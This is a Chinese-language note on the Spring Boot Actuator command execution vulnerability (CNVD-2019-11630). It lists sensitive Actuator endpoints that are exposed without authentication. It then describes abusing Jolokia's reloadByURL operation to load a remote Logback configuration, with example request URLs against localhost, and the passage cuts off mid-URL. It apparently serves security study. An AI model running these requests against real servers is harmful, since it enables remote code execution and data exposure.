spring框架漏洞整理(Spring Boot Actuator命令执行漏洞)

spring框架漏洞整理之CNVD-2019-11630 Spring Boot Actuator命令执行漏洞

https://www.veracode.com/blog/research/exploiting-spring-boot-actuators#

这个漏洞并不像是单一的问题产生，更像是一个渗透入侵的过程。有大概5个值得在意的知识点

1、Spring Boot 1-1.4，无需身份验证即可访问以下敏感路径，而在 2.x 中，存在于 /actuator 路径下。

/dump-显示线程转储（包括堆栈跟踪）
/trace-显示最后几条HTTP消息（其中可能包含会话标识符）
/logfile-输出日志文件的内容
/shutdown-关闭应用程序
/mappings-显示所有MVC控制器映射
/env-提供对配置环境的访问
/restart-重新启动应用程序

2、jolokia 进行远程代码执行，Jolokia 允许通过 HTTP 访问所有已注册的 MBean，并且旨在执行与 JMX 相同的操作。可以使用 URL 列出所有可用的 MBeans 操作：

http://127.0.0.1:8090/jolokia/list

Logback 库提供的 reloadByURL 操作使我们可以从外部 URL 重新加载日志配置，地址如：

http://localhost:8090/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXCo